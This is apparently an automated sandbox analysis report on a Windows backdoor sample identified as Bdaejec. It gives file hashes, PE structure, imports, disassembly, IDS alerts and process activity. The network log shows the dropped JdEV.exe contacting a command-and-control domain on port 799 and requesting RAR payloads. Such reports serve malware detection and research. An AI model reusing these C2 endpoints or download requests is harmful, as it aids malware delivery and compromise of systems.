                                                            File Type:Windows Precompiled iNF, version 3.3 (Windows 10), flags 0x1000083, unicoded, has strings, at 0x1100 "Signature", at 0x68 WinDirPath, LanguageID 809
                                                            Category:dropped
                                                            Size (bytes):5740
                                                            Entropy (8bit):3.173847699149194
                                                            Encrypted:false
                                                            SSDEEP:96:EHv3dP0/4NiuIR0ONNjnuUw8u5pF6KXkRQ1fsCncekSDzD:E1viuCVDjuT8u5p4K05CcWDzD
                                                            MD5:3821A155A04A6A2E4811B60BEE95BA38
                                                            SHA1:76E66DB688BD24BC907D7EF90A951D4CD74FB710
                                                            SHA-256:6931E4EA0B4B6C80DA549F8EAA738639FBC03590B0429C773C5E6D75085E80D4
                                                            SHA-512:DF33A4829683F534C505FADC7BE5BB2899614A42FE85446ABA8593D4C13D065C25871557563F9F3D7F1BAEA4927788B184573B9A8CC4C248BA873AEB8D0E1B18
                                                            Malicious:false
                                                            Preview:................H..................................H...............(.......H...h...............h.......C.:.\.W.i.n.d.o.w.s.....x...................................................$...............................................................................................................d...(...........................................................................................................................................................................................................................................................x...................................................................$...............................................................................................4...........................0.......................................................................................................................................................................................................p...........................................................
                                                            Process:C:\Users\user\Desktop\BXOZIGZEUa.exe
                                                            File Type:Windows Precompiled iNF, version 3.3 (Windows 10), flags 0x1000083, unicoded, has strings, at 0x1210 "Signature", at 0x68 WinDirPath, LanguageID 809
                                                            Category:dropped
                                                            Size (bytes):6284
                                                            Entropy (8bit):3.210060094944142
                                                            Encrypted:false
                                                            SSDEEP:96:f4rgQY2e/NI0IXSu6o4zvM181fQ1UvZUuQSCUJ:b2e/BfosxZUK/
                                                            MD5:37B7D5A41FF318D021B72C680E68CC3B
                                                            SHA1:69977EC82CFD33B3A06BA4DD06553CE6E8FDD256
                                                            SHA-256:81E03C26AA1707F2019E050037D31F89B80F808CE9F4C5CE804FC43BE1E22355
                                                            SHA-512:F112FF23C1542737CB3A519C862F9A746F7922BD0983B942A03099942D23C8AD219B02A2ACD6F4C2E442E8A23009C0E460238A69DE7331FD1A071FC4E78353C3
                                                            Malicious:false
                                                            Preview:................X........K.}........................h.......p...D.......d... ...h.......................C.:.\.W.i.n.d.o.w.s.............................................................................................................................................................................................................H...........................................8.......................................H.......................................................................................................................................................................................................................................,.......................................................................................................................................................................................................................................................................................................h...............................................8...........
                                                            Process:C:\Users\user\AppData\Local\Temp\JdEV.exe
                                                            File Type:MS Windows registry file, NT/2000 or above
                                                            Category:dropped
                                                            Size (bytes):1835008
                                                            Entropy (8bit):4.422036462537943
                                                            Encrypted:false
                                                            SSDEEP:6144:CSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNy0uhiTw:RvloTMW+EZMM6DFyo03w
                                                            MD5:80B89F8FCF476C2A28F60EE858390297
                                                            SHA1:A410BB54B91DCBAFD6ECCD716C99D6A2EF07BBE3
                                                            SHA-256:84B92EFB5396866E980B218C3C815A344CC091463AAEC4F2E7402C44A9F87FC2
                                                            SHA-512:4C991D31CF6C323492EB4FD1303AEE69CD1210F7551982C66D9CE9099223EC3B134933A0DAB62A3419FD74D50DE92A62D6A0652052DDC03A13BADB608FD51834
                                                            Malicious:false
                                                            Preview:regf?...?....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm"....`..............................................................................................................................................................................................................................................................................................................................................F..)........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            File type:PE32 executable (console) Intel 80386, for MS Windows
                                                            Entropy (8bit):6.426054235926492
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:BXOZIGZEUa.exe
                                                            File size:1'700'352 bytes
                                                            MD5:fa07873f37b171a5567a9b4b3f2c65eb
                                                            SHA1:47d5210522d8c54d3076c1467f2f495025037bb6
                                                            SHA256:8f5469d96f148afd08a0f693684f9bb0195a5291eb2437214c01465b463acbf8
                                                            SHA512:68a8f289ea6acdd7b79595cd8f7cde9ff468f2e26b56e1b7cef024b8a999f834a94e43c165a5a9b0c4b42008afb7b9446b29aa2019c68133d65409d631c19f29
                                                            SSDEEP:49152:XE4XbjEKOh3SbiwJjn7gu5LUvdW9apuLvht/cionurM0EIMa1:Xrj834iwJjn7gu5LmMapuNiiMurM0
                                                            TLSH:96759D3136908077C67B32319B9AA3FDB6F9A5304D35524B56A10E3C2E709D3A92C76F
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7Nd.s/..s/..s/..zW..r/..zW.../..h..._/..h..../..h.......zW..V/..s/...-..h...q/..h...r/..h...r/..Richs/..........PE..L.....q]...
                                                            Icon Hash:00928e8e8686b000
                                                            Entrypoint:0x5a6000
                                                            Entrypoint Section:uY
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows cui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x5D71F817 [Fri Sep 6 06:09:27 2019 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:1
                                                            File Version Major:5
                                                            File Version Minor:1
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:1
                                                            Import Hash:6f75980df73bd959bec9fcfb664cfd02
                                                            Instruction
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 0000016Ch
                                                            xor eax, eax
                                                            push ebx
                                                            push esi
                                                            push edi
                                                            mov dword ptr [ebp-24h], eax
                                                            mov dword ptr [ebp-10h], eax
                                                            mov dword ptr [ebp-14h], eax
                                                            mov dword ptr [ebp-08h], eax
                                                            mov dword ptr [ebp-0Ch], eax
                                                            mov dword ptr [ebp-20h], eax
                                                            mov dword ptr [ebp-18h], eax
                                                            mov dword ptr [ebp-48h], 5645644Ah
                                                            mov dword ptr [ebp-44h], 6578652Eh
                                                            mov dword ptr [ebp-40h], 00000000h
                                                            mov dword ptr [ebp-3Ch], 00000000h
                                                            call 00007FF040E682F5h
                                                            pop eax
                                                            add eax, 00000225h
                                                            mov dword ptr [ebp-04h], eax
                                                            mov eax, dword ptr fs:[00000030h]
                                                            mov dword ptr [ebp-28h], eax
                                                            mov eax, dword ptr [ebp-04h]
                                                            mov dword ptr [eax], E904C483h
                                                            mov eax, dword ptr [ebp-04h]
                                                            mov dword ptr [eax+04h], FFF58236h
                                                            mov eax, dword ptr [ebp-28h]
                                                            mov eax, dword ptr [eax+0Ch]
                                                            mov eax, dword ptr [eax+1Ch]
                                                            mov eax, dword ptr [eax]
                                                            mov eax, dword ptr [eax+08h]
                                                            mov ecx, dword ptr [eax+3Ch]
                                                            mov ecx, dword ptr [ecx+eax+78h]
                                                            add ecx, eax
                                                            mov edi, dword ptr [ecx+1Ch]
                                                            mov ebx, dword ptr [ecx+20h]
                                                            mov esi, dword ptr [ecx+24h]
                                                            mov ecx, dword ptr [ecx+18h]
                                                            add esi, eax
                                                            add edi, eax
                                                            add ebx, eax
                                                            xor edx, edx
                                                            mov dword ptr [ebp-30h], esi
                                                            mov dword ptr [ebp-1Ch], edx
                                                            mov dword ptr [ebp-34h], ecx
                                                            cmp edx, dword ptr [ebp-34h]
                                                            jnc 00007FF040E6843Eh
                                                            movzx ecx, word ptr [esi+edx*2]
                                                            mov edx, dword ptr [ebx+edx*4]
                                                            mov esi, dword ptr [edi+ecx*4]
                                                            add edx, eax
                                                            mov ecx, dword ptr [edx]
                                                            add esi, eax
                                                            cmp ecx, 4D746547h
                                                            jne 00007FF040E68344h
                                                            cmp dword ptr [edx+04h], 6C75646Fh
                                                            jne 00007FF040E6833Bh
                                                            Programming Language:
                                                            • [C++] VS2008 SP1 build 30729
                                                            • [ C ] VS2008 SP1 build 30729
                                                            • [ASM] VS2010 SP1 build 40219
                                                            • [ C ] VS2010 SP1 build 40219
                                                            • [C++] VS2010 SP1 build 40219
                                                            • [IMP] VS2008 SP1 build 30729
                                                            • [RES] VS2010 SP1 build 40219
                                                            • [LNK] VS2010 SP1 build 40219
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x1692500x168.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x17b0000x6d8.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x17c0000x1a450.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x128d400x1c.rdata
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x152ba00x40.rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x1280000x934.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x1268a30x126a00f488be5fc3a676598f8a364845853fadFalse0.5610067750318201data6.539294700431528IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x1280000x444ba0x44600e3d187bee7a20b52c8a5aa950dc5959cFalse0.27052745086837293data5.047397246056738IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0x16d0000xdb040x60002f590fbdc2c5ab2e1fce65b7a0243ebbFalse0.2849934895833333data4.7641816505688IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x17b0000x6d80x80018b01f74d64d681072db0f41366c4eb8False0.353515625data4.6625627260129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x17c0000x293f40x294003edbefab711cfe5d831cbd18bbf4c4bdFalse0.26879142992424243data4.982795266679088IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                            uY0x1a60000x50000x42000cbe2dac05299bb6514c66d11d100775False0.7771070075757576data6.933836062310107IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_STRING0x17b0e80x3edataEnglishUnited States0.6612903225806451
                                                            RT_VERSION0x17b1280x344dataChineseChina0.4258373205741627
                                                            RT_MANIFEST0x17b46c0x26aASCII text, with very long lines (618), with no line terminatorsEnglishUnited States0.43042071197411
                                                            DLLImport
                                                            SETUPAPI.dllSetupGetStringFieldW, SetupDiDestroyDeviceInfoList, SetupDiCallClassInstaller, SetupDiGetDeviceRegistryPropertyW, SetupDiEnumDeviceInfo, SetupDiGetClassDevsW, SetupFindNextLine, SetupCloseInfFile, SetupFindFirstLineW, SetupOpenInfFileW, SetupUninstallOEMInfW
                                                            KERNEL32.dllIsProcessorFeaturePresent, HeapCreate, FreeEnvironmentStringsW, IsValidCodePage, QueryPerformanceCounter, GetStringTypeW, GetTimeZoneInformation, GetConsoleMode, EnumSystemLocalesA, IsValidLocale, WriteConsoleW, GetDriveTypeW, SetEnvironmentVariableA, CreateFileA, GetConsoleCP, GetLocaleInfoA, LCMapStringW, GetOEMCP, GetACP, GetCPInfo, GetStartupInfoW, GetStdHandle, SetHandleCount, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, GetFileType, GetProcessHeap, SetStdHandle, VirtualQuery, GetSystemInfo, VirtualAlloc, GetSystemTimeAsFileTime, HeapSize, HeapQueryInformation, CreateThread, ExitThread, HeapReAlloc, RaiseException, ExitProcess, RtlUnwind, HeapAlloc, HeapSetInformation, HeapFree, DecodePointer, EncodePointer, FindResourceExW, GetUserDefaultLCID, VirtualProtect, GetNumberFormatW, SearchPathW, Sleep, GetProfileIntW, GetTickCount, GetFileTime, GetFileSizeEx, GetFileAttributesExW, GetTempPathW, GetTempFileNameW, GetFullPathNameW, GetVolumeInformationW, GetCurrentProcess, DuplicateHandle, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, CreateFileW, lstrcmpiW, FreeResource, GlobalFindAtomW, InitializeCriticalSectionAndSpinCount, lstrlenA, GlobalGetAtomNameW, GetCurrentProcessId, GlobalAddAtomW, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileIntW, InterlockedIncrement, TlsFree, DeleteCriticalSection, LocalReAlloc, TlsSetValue, TlsAlloc, InitializeCriticalSection, GlobalHandle, GlobalReAlloc, EnterCriticalSection, TlsGetValue, LeaveCriticalSection, CompareStringW, GlobalFlags, InterlockedDecrement, ReleaseActCtx, CreateActCtxW, GetVersionExW, lstrcpyW, GetSystemDirectoryW, GetCurrentDirectoryW, WaitForSingleObject, ResumeThread, SetThreadPriority, CloseHandle, FileTimeToLocalFileTime, FileTimeToSystemTime, FindFirstFileW, FindNextFileW, FindClose, GlobalFree, CopyFileW, GlobalSize, GlobalUnlock, FormatMessageW, MulDiv, SetErrorMode, lstrcmpA, GlobalDeleteAtom, GetCurrentThread, GetCurrentThreadId, GetModuleFileNameW, GetUserDefaultUILanguage, ConvertDefaultLocale, GetSystemDefaultUILanguage, ActivateActCtx, LoadLibraryW, DeactivateActCtx, SetLastError, MultiByteToWideChar, GlobalLock, lstrcmpW, GlobalAlloc, GetProcAddress, FreeLibrary, GetLocaleInfoW, LoadLibraryExW, InterlockedExchange, LocalAlloc, LocalFree, SetFileAttributesW, GetFileAttributesW, DeleteFileW, WideCharToMultiByte, lstrlenW, GetLastError, GetWindowsDirectoryW, FindResourceW, LoadResource, LockResource, SizeofResource, GetModuleHandleW, GetCommandLineW, GetEnvironmentStringsW
                                                            USER32.dllRegisterClipboardFormatW, EmptyClipboard, CloseClipboard, SetClipboardData, OpenClipboard, GetMenuDefaultItem, CreateDialogIndirectParamW, GetNextDlgTabItem, EndDialog, GetUpdateRect, FrameRect, IsClipboardFormatAvailable, SetMenuDefaultItem, WaitMessage, PostThreadMessageW, CreateMenu, IsMenu, UpdateLayeredWindow, EnableScrollBar, UnionRect, MonitorFromPoint, TranslateMDISysAccel, DrawMenuBar, DefMDIChildProcW, DefFrameProcW, UnpackDDElParam, ReuseDDElParam, LoadImageW, InsertMenuItemW, TranslateAcceleratorW, CopyImage, DestroyIcon, LockWindowUpdate, BringWindowToTop, SetCursorPos, SetRect, CreateAcceleratorTableW, LoadAcceleratorsW, GetKeyboardState, GetKeyboardLayout, MapVirtualKeyW, ToUnicodeEx, CopyAcceleratorTableW, DrawFocusRect, DrawFrameControl, DrawEdge, DrawIconEx, DrawStateW, MessageBeep, ReleaseCapture, SetCapture, GetSystemMenu, LoadMenuW, IntersectRect, SetClassLongW, GetAsyncKeyState, NotifyWinEvent, WindowFromPoint, CreatePopupMenu, DestroyAcceleratorTable, SetParent, SetWindowRgn, IsZoomed, IsIconic, OffsetRect, IsRectEmpty, DestroyMenu, GetMenuItemInfoW, InflateRect, CharUpperW, ShowWindow, MoveWindow, IsDialogMessageW, CopyIcon, CheckDlgButton, RegisterWindowMessageW, LoadIconW, SendDlgItemMessageW, SendDlgItemMessageA, WinHelpW, IsChild, GetCapture, GetClassLongW, SetPropW, GetPropW, RemovePropW, IsWindow, SetFocus, GetForegroundWindow, SetActiveWindow, BeginDeferWindowPos, EndDeferWindowPos, GetDlgItem, GetTopWindow, DestroyWindow, GetMessageTime, GetMessagePos, MonitorFromWindow, ScrollWindow, TrackPopupMenu, SetMenu, SetScrollRange, GetScrollRange, SetScrollPos, GetScrollPos, SetForegroundWindow, ShowScrollBar, RedrawWindow, CreateWindowExW, GetClassInfoExW, RegisterClassW, AdjustWindowRectEx, EqualRect, DeferWindowPos, GetScrollInfo, SetScrollInfo, SetWindowPlacement, GetWindowPlacement, CallWindowProcW, GetMenu, SetWindowLongW, SetWindowPos, GetWindowTextLengthW, GetWindowThreadProcessId, GetLastActivePopup, PostQuitMessage, PostMessageW, RemoveMenu, GetSubMenu, GetMenuItemCount, IsWindowEnabled, EnableWindow, MessageBoxW, KillTimer, SetTimer, InvalidateRect, UpdateWindow, GetDesktopWindow, RealChildWindowFromPoint, GetWindow, GetDlgCtrlID, GetWindowRect, GetWindowLongW, GetClassNameW, PtInRect, CharUpperBuffW, GetDoubleClickTime, GetIconInfo, IsCharLowerW, GetKeyNameTextW, MapVirtualKeyExW, SubtractRect, InvertRect, MapDialogRect, HideCaret, GetNextDlgGroupItem, GetWindowTextW, SetWindowTextW, EndPaint, BeginPaint, GetWindowDC, ReleaseDC, GetDC, ClientToScreen, ScreenToClient, GrayStringW, GetWindowRgn, DestroyCursor, DrawIcon, InsertMenuW, GetMenuItemID, AppendMenuW, GetMenuStringW, GetMenuState, ValidateRect, GetCursorPos, PeekMessageW, GetKeyState, SendMessageW, IsWindowVisible, GetActiveWindow, DispatchMessageW, TranslateMessage, GetMessageW, CallNextHookEx, SetWindowsHookExW, CheckMenuItem, EnableMenuItem, ModifyMenuW, GetParent, GetFocus, LoadBitmapW, GetMenuCheckMarkDimensions, SetMenuItemBitmaps, SetCursor, ShowOwnedPopups, DeleteMenu, CopyRect, SetRectEmpty, GetMonitorInfoW, SystemParametersInfoW, EnumDisplayMonitors, GetSystemMetrics, GetSysColor, SetLayeredWindowAttributes, LoadCursorW, GetClientRect, MapWindowPoints, DefWindowProcW, GetClassInfoW, GetSysColorBrush, UnhookWindowsHookEx, FillRect, TabbedTextOutW, DrawTextW, DrawTextExW
                                                            GDI32.dllGetObjectType, CreateHatchBrush, GetTextExtentPoint32W, CreateDIBSection, CreateRoundRectRgn, CreatePolygonRgn, CombineRgn, GetBkColor, GetTextColor, PatBlt, CreateEllipticRgn, Polyline, Ellipse, Polygon, SetRectRgn, DPtoLP, OffsetRgn, GetRgnBox, SetDIBColorTable, RealizePalette, StretchBlt, SetPixel, SelectPalette, CreatePalette, GetPaletteEntries, GetNearestPaletteIndex, GetSystemPaletteEntries, LPtoDP, GetWindowOrgEx, GetViewportOrgEx, PtInRegion, FillRgn, FrameRgn, GetBoundsRect, ExtFloodFill, SetPaletteEntries, EnumFontFamiliesExW, GetTextFaceW, SetPixelV, SetViewportOrgEx, SelectObject, Escape, DeleteDC, ExtSelectClipRgn, ScaleWindowExtEx, SetWindowExtEx, OffsetWindowOrgEx, SetWindowOrgEx, ScaleViewportExtEx, SetViewportExtEx, CreateCompatibleBitmap, GetObjectW, CreateFontIndirectW, CreatePatternBrush, CreateSolidBrush, CreatePen, GetStockObject, CreateDIBitmap, CreateBitmap, CreateDCW, CopyMetaFileW, Rectangle, GetDeviceCaps, ExtTextOutW, TextOutW, RectVisible, PtVisible, GetPixel, GetWindowExtEx, GetViewportExtEx, CreateRectRgn, SelectClipRgn, SetLayout, GetLayout, SetTextAlign, MoveToEx, LineTo, IntersectClipRect, ExcludeClipRect, GetClipBox, SetMapMode, SetTextColor, SetROP2, SetPolyFillMode, SetBkMode, SetBkColor, RestoreDC, SaveDC, DeleteObject, GetTextCharsetInfo, EnumFontFamiliesW, GetTextMetricsW, BitBlt, CreateCompatibleDC, CreateRectRgnIndirect, OffsetViewportOrgEx
                                                            MSIMG32.dllTransparentBlt, AlphaBlend
                                                            COMDLG32.dllGetFileTitleW
                                                            WINSPOOL.DRVOpenPrinterW, DocumentPropertiesW, ClosePrinter
                                                            ADVAPI32.dllRegEnumKeyExW, RegQueryValueExW, RegOpenKeyExW, RegCreateKeyExW, RegDeleteKeyW, RegSetValueExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegQueryValueW, RegEnumKeyW
                                                            SHELL32.dllSHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, DragFinish, DragQueryFileW, SHAppBarMessage, SHBrowseForFolderW, SHGetSpecialFolderLocation, SHGetDesktopFolder
                                                            COMCTL32.dllImageList_GetIconSize
                                                            SHLWAPI.dllPathStripToRootW, PathIsUNCW, PathRemoveFileSpecW, PathFindFileNameW, PathFindExtensionW
                                                            ole32.dllCoInitializeEx, DoDragDrop, CreateStreamOnHGlobal, OleLockRunning, IsAccelerator, OleTranslateAccelerator, OleDestroyMenuDescriptor, OleCreateMenuDescriptor, CoUninitialize, CoInitialize, CoCreateInstance, OleDuplicateData, CoTaskMemAlloc, ReleaseStgMedium, RevokeDragDrop, CoLockObjectExternal, RegisterDragDrop, OleGetClipboard, CoTaskMemFree, CoCreateGuid
                                                            OLEAUT32.dllSysStringLen, VariantClear, VariantChangeType, VariantTimeToSystemTime, SystemTimeToVariantTime, SysAllocStringLen, VarBstrFromDate, VariantInit, SysAllocString, SysFreeString
                                                            gdiplus.dllGdipGetImageGraphicsContext, GdipBitmapUnlockBits, GdipBitmapLockBits, GdipCreateBitmapFromScan0, GdipCreateBitmapFromStream, GdipGetImagePalette, GdipGetImagePaletteSize, GdipGetImagePixelFormat, GdipGetImageHeight, GdipGetImageWidth, GdipCloneImage, GdipDrawImageRectI, GdipSetInterpolationMode, GdipCreateFromHDC, GdiplusShutdown, GdiplusStartup, GdipCreateBitmapFromHBITMAP, GdipDisposeImage, GdipDeleteGraphics, GdipAlloc, GdipFree, GdipDrawImageI
                                                            OLEACC.dllAccessibleObjectFromWindow, CreateStdAccessibleObject, LresultFromObject
                                                            IMM32.dllImmReleaseContext, ImmGetContext, ImmGetOpenStatus
                                                            WINMM.dllPlaySoundW
                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishUnited States
                                                            ChineseChina
                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2025-01-07T06:07:57.948894+01002838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup1192.168.2.5563991.1.1.153UDP
                                                            2025-01-07T06:07:58.585996+01002807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin1192.168.2.54970444.221.84.105799TCP
                                                            2025-01-07T06:08:02.958493+01002807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin1192.168.2.54970544.221.84.105799TCP
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jan 7, 2025 06:07:58.212992907 CET49704799192.168.2.544.221.84.105
                                                            Jan 7, 2025 06:07:58.217988968 CET7994970444.221.84.105192.168.2.5
                                                            Jan 7, 2025 06:07:58.218066931 CET49704799192.168.2.544.221.84.105
                                                            Jan 7, 2025 06:07:58.218935966 CET49704799192.168.2.544.221.84.105
                                                            Jan 7, 2025 06:07:58.223764896 CET7994970444.221.84.105192.168.2.5
                                                            Jan 7, 2025 06:07:58.585882902 CET7994970444.221.84.105192.168.2.5
                                                            Jan 7, 2025 06:07:58.585895061 CET7994970444.221.84.105192.168.2.5
                                                            Jan 7, 2025 06:07:58.585995913 CET49704799192.168.2.544.221.84.105
                                                            Jan 7, 2025 06:07:58.593066931 CET49704799192.168.2.544.221.84.105
                                                            Jan 7, 2025 06:07:58.599452972 CET7994970444.221.84.105192.168.2.5
                                                            Jan 7, 2025 06:08:02.567219019 CET49705799192.168.2.544.221.84.105
                                                            Jan 7, 2025 06:08:02.572099924 CET7994970544.221.84.105192.168.2.5
                                                            Jan 7, 2025 06:08:02.572249889 CET49705799192.168.2.544.221.84.105
                                                            Jan 7, 2025 06:08:02.572530985 CET49705799192.168.2.544.221.84.105
                                                            Jan 7, 2025 06:08:02.577372074 CET7994970544.221.84.105192.168.2.5
                                                            Jan 7, 2025 06:08:02.958358049 CET7994970544.221.84.105192.168.2.5
                                                            Jan 7, 2025 06:08:02.958374977 CET7994970544.221.84.105192.168.2.5
                                                            Jan 7, 2025 06:08:02.958492994 CET49705799192.168.2.544.221.84.105
                                                            Jan 7, 2025 06:08:03.213107109 CET49705799192.168.2.544.221.84.105
                                                            Jan 7, 2025 06:08:03.218053102 CET7994970544.221.84.105192.168.2.5
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jan 7, 2025 06:07:57.948894024 CET5639953192.168.2.51.1.1.1
                                                            Jan 7, 2025 06:07:58.129590034 CET53563991.1.1.1192.168.2.5
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Jan 7, 2025 06:07:57.948894024 CET192.168.2.51.1.1.10xe4d2Standard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Jan 7, 2025 06:07:58.129590034 CET1.1.1.1192.168.2.50xe4d2No error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                                                            • ddos.dnsnb8.net:799
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.54970444.221.84.1057993524C:\Users\user\AppData\Local\Temp\JdEV.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 7, 2025 06:07:58.218935966 CET288OUTGET /cj//k1.rar HTTP/1.1
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                            Host: ddos.dnsnb8.net:799
                                                            Connection: Keep-Alive


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.54970544.221.84.1057993524C:\Users\user\AppData\Local\Temp\JdEV.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 7, 2025 06:08:02.572530985 CET288OUTGET /cj//k2.rar HTTP/1.1
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                            Host: ddos.dnsnb8.net:799
                                                            Connection: Keep-Alive


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:00:07:56
                                                            Start date:07/01/2025
                                                            Path:C:\Users\user\Desktop\BXOZIGZEUa.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\BXOZIGZEUa.exe"
                                                            Imagebase:0x4d0000
                                                            File size:1'700'352 bytes
                                                            MD5 hash:FA07873F37B171A5567A9B4B3F2C65EB
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:1
                                                            Start time:00:07:56
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:00:07:56
                                                            Start date:07/01/2025
                                                            Path:C:\Users\user\AppData\Local\Temp\JdEV.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Local\Temp\JdEV.exe
                                                            Imagebase:0xd10000
                                                            File size:15'872 bytes
                                                            MD5 hash:56B2C3810DBA2E939A8BB9FA36D3CF96
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 97%, ReversingLabs
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:00:08:03
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 1592
                                                            Imagebase:0xd10000
                                                            File size:483'680 bytes
                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:2.7%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:6.8%
                                                              Total number of Nodes:1214
                                                              Total number of Limit Nodes:34
